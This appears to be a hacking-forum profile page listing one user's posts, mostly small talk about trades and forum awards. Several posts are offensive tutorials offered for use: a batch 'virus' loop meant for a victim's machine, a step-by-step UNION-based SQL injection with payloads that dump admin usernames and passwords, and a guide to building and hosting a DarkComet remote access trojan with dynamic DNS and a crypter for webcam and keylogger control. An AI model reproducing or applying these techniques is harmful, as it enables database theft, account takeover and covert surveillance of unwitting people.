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The High Roller

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Everything posted by The High Roller

  1. ok i will pm you tommorow i dont have prob if i pay you firist 8) i like safe trades hate scammers like this erica...
  2. your 2nd account have clean ranked games?
  3. Russian Premium Porn Sites + Hacking Forums
  4. thanks :)
  5. lol im new member here you are so aggresive.. i trying to make some shares to help but if none cares i can go out fom here cheers.
  6. Part One I wrote this a while back on an old forum, and it was leeched and put on HF and other forums. This is my tut, but if you see it elsewhere don't say I leeched it. Well, I see that you have decided to take part on this journey of batch coding. I am just going to let you know beforehand that some of the stuff after this can get annoying if you have errors in your code, so don't give up! Anyways, let's get on with the tutorial. First you are going to want to open up a normal text file in notepad. Then you are going to want to type something like this: That "Echo" command is the best way to communicate to the person using your batch file. It will display a message on the screen with whatever you typed. Now you can go ahead and save by changing the .txt to a .bat, and making sure it is on "All Files" as the save option: Now run your batch file, wherever you saved it. Did you see a flash on your screen? That was the batch file coming up and disappearing almost instantly. The reason for this is because there was no command to make it wait for the user to close it. What you are going to need to do is right click on the batch file and click on "Edit": Now you are going to want to type the word "pause" on the line afterwards, like so: The command pause waits for the user to press a certain button or use a certain function (in this case, any key on the keyboard). Now you can save it again. Run your batch file again, and it should look something like this: Oh gosh, another problem? Yes. This time the issue is that the batch program is displaying the directory of where the command is coming from. In my case, it is showing the path to the desktop, where I have the file saved. But there is a very easy fix to this. Open it up using the "Edit" option in the right click menu, and type "@echo off" a line BEFORE the "echo" command line: This "@echo off" is the SINGLE MOST IMPORTANT COMMAND YOU WILL EVER USE IN A BATCH FILE EVER. Sorry about the all caps, I was just trying to get it through your head that it is the SINGLE MOST IMPORTANT COMMAND YOU WILL EVER USE IN A BATCH FILE EV.. fine, I'll stop now. There is a little more of an in-depth explanation I could give you here, but the easiest way to explain it is that it basically covers up that directory, so that you don't see the actual command being processed, and just the output. Alright, now that I am done explaining that to you, save your batch file and run it: Success! You have made your first batch file. Doesn't matter at this point how complex it is, because at the end of this tutorial you'll be able to make a complex one yourself. On the next page, I will be talking about making your batch file wait a period of time, and also how to use user input to operate the commands you want.
  7. yeah i see other ranks :) dont worry but the problem are some staffers are inactive too thats why Community Low..
  8. So this is a tutorial on how to make your very first simple windows virus! NOOBS ONLY Ok so 1st what your going to want to do is go on your desktop, right click, and make a new text document. We will be writing our code in this document. The coding language we will be using is batch. I know your probably like "HURR DURR THIS IS STUPID" well then GTFO as i said earlier, NOOBS ONLY! Anyway, at the top of the newly created text document, write @echo off . This basically turns off all un-needed and extra texts. Now write :Virus < this makes a checkpoint in the program that we can later access or goto. You can change "Virus" to anything as that is only the name of the checkpoint, but MAKE SURE you write : as that is what marks a checkpoint. Now write md Virus . This will create a folder named Virus in the current directory that your victim has opened the Virus in. md marks to create a folder, while Virus is only the name of the folder. You might be thinking this doesnt do much, but you just wait ;) Now for the last part, write goto Virus. What this does is it goes back to the checkpoint (:Virus) which we created earlier. If you changed the name of the checkpoint make sure to change it here as well. Now for the final stage, we need to make windows recognize its a batch file, to do this, click File > Save As > Virus.bat . This will save the file as a .bat or a batch file, which is the coding language we wrote our virus in. the whole code will look like: Now that you know how to do this, try doing the same thing exept spamming open Internet Explorer, (HINT: Quotation marks: " " open a certain program) To accomplish this, find the directory of IE, and use quotation marks to tell the file to open Internet Explorer. Happy Hacking :)
  9. dont worry dude i will re-upload new links ;)
  10. hmmm thanks for infromation but. its a nice forum with inactive administrator :/ thats very bad dude.
  11. 1. Find a vulnerable website. here is a example! 2. http://www.site.com/index.php?=5' Ps:Don't type error after after this (--) 3. http://www.site.com/index.php?=5 order by 10-- error http://www.site.com/index.php?=5 order by 9-- error http://www.site.com/index.php?=5 order by 8-- No error :cheers: 4. the site has 8 columns. 5. Do like below:) 6. http://www.site.com/index.php?=-5 union select 1,2,3,4,5,6,7,8-- 7. This will show some numbers on the page lets say it is number 3 on the page. 8.Let's get some tables: http://www.site.com/index.php?=-5 union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables-- 9. You will see tables: check for anything like admin, username, user. I found admin and lets start harvesting:) 10.Type this: http://www.site.com/index.php?=-5 union select 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_name=database()-- 11.Now you have the table name and the name is admin that you finded before this.Now the columns that you will see right now is maybe Username or Password. 12. Soo to get the password and username from admin type this. 13. http://www.site.com/index.php?=-5 union select 1,2,group_concat(username,0x3a,password),4,5,6,7,8 from admin 14. And press enter. 15. you will see this. username:password. ps: the password can be plain text or in a hash:) 16. now get admin page and login and do whatever you want. 17. creedits to blazer15. :cheers: I tried my best! but i hope it will help you:):blackhat:
  12. i made a wrong, http://maxcheaters.com/forum/index.php?topic=265009.0 move it to hacks tutorials. :)
  13. DarkComet v5.3 Setup "France is proud to present DarkComet, a Remote Administration Tool already chosen by hundreds of thousands of people worldwide. These users describe DarkComer-RAT one of the very best around, it is totally free to use and allows you to control many remote machines at the same time using hundreds of functions (webcam streaming, desktop streaming, micro streaming, keylogger, MSN control, system control, etc, etc.) DarkComet is also considered as the most stable RAT around and it is even regarded more stable than some professional ones (professional is another word for not free). Why would you spend even one dollar on a RAT when you can have better one for free ?" (Quoted from DarkComet Website) Downloading DarkComet: Go to: http://www.mediafire.com/?t18hn4u2yap1cvw Using No-Ip and Creating Account Go Here: http://www.no-ip.com Click Create Account: Click Free DNS: Fill in your information and activate your account: Download No-Ip Client (Select Windows): Login to your account on No-Ip.com Make a Host with NO-IP.BIZ and make a random name in the text-box and leave everything else. Login to No-IP Client using the Email Address and password you signed up before Select 'Select Hosts': Tick the host-name that you had made before: Congrats! You have finished the first stage! Using DarkComet 5.3 and Setting Up: Port-forward the port 100 Learn how to port-forward: I will post a Tut later about this, or read your Router's manual After That: Open DarkComet v5.2: Click on the Top Left corner where it says DarkComet-Rat and click on Listen to new port. Use the port 100 which you port-forwarded earlier. Then Click Listen: After adding the listened port, click on the Top Left corner again and click on Server Module : Follow the image and don't check the Firewall thing if you are using a crypter afterwards: Network Settings, Change the Ip/DNS to your domain name you made with No-ip, change port to 100: Don't check Module startup if your crypter has startup as a option!! Skip everything else unless you need them: Click on Build Module and leave the Building as is: Lets test the Server, make sure No-ip client is on! Hope you liked the TUT!
  14. thank u :) i think its a good idea for this forum :) i will be make more sugestion but still waiting administrator...
  15. thanks for feedback :)
  16. im new here from some hacking forums ;)
  17. still waiting for serious answers..
  18. i can make fap award but i dont see any warez porno section ::)
  19. thanks guys waiting for more answers))
  20. you can search in torrent too :)
  21. Sory for double updated topic x2 new awards added.
  22. Upgrader Award Like Trusted etc, :) but u can use it if you help a lot of ppl with problems etc, ;)
  23. its not a share to give credits lol.. Edited: 2 New Awards added in the post. :)
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